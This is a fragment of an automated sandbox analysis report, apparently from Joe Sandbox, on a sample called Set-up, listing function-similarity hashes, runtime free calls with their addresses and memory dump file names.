                                                                                          Similarity
                                                                                          • API ID: free
                                                                                          • String ID:
                                                                                          • API String ID: 1294909896-0
                                                                                          • Opcode ID: a000eefa6d3264a98c2b05f513be450c70880cf594f64256d34ed54f9056df7a
                                                                                          • Instruction ID: 3e0b11f92a7d78f3dcde41f5f40d1490bdb6a0215723c3f4c08403f434325933
                                                                                          • Opcode Fuzzy Hash: a000eefa6d3264a98c2b05f513be450c70880cf594f64256d34ed54f9056df7a
                                                                                          • Instruction Fuzzy Hash: 9A11D673500204ABD721AF14EC41B26BB69EFE4710F190164FE181B26AF772F92587D1
                                                                                          APIs
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E52D
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E55F
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E576
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E598
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: free
                                                                                          • String ID:
                                                                                          • API String ID: 1294909896-0
                                                                                          • Opcode ID: e822738a9c7053b94d8772f9aead2d3612dad8c7544383263fe06c7a961a4be3
                                                                                          • Instruction ID: 04f336c25e3de7f9b42a3b197dbea1c18be02bab18cdacf808de897a18987e74
                                                                                          • Opcode Fuzzy Hash: e822738a9c7053b94d8772f9aead2d3612dad8c7544383263fe06c7a961a4be3
                                                                                          • Instruction Fuzzy Hash: ED110373500204BBD721AF04EC41B2ABBA9EFD4724F190164EE181B2AAF772F92587D1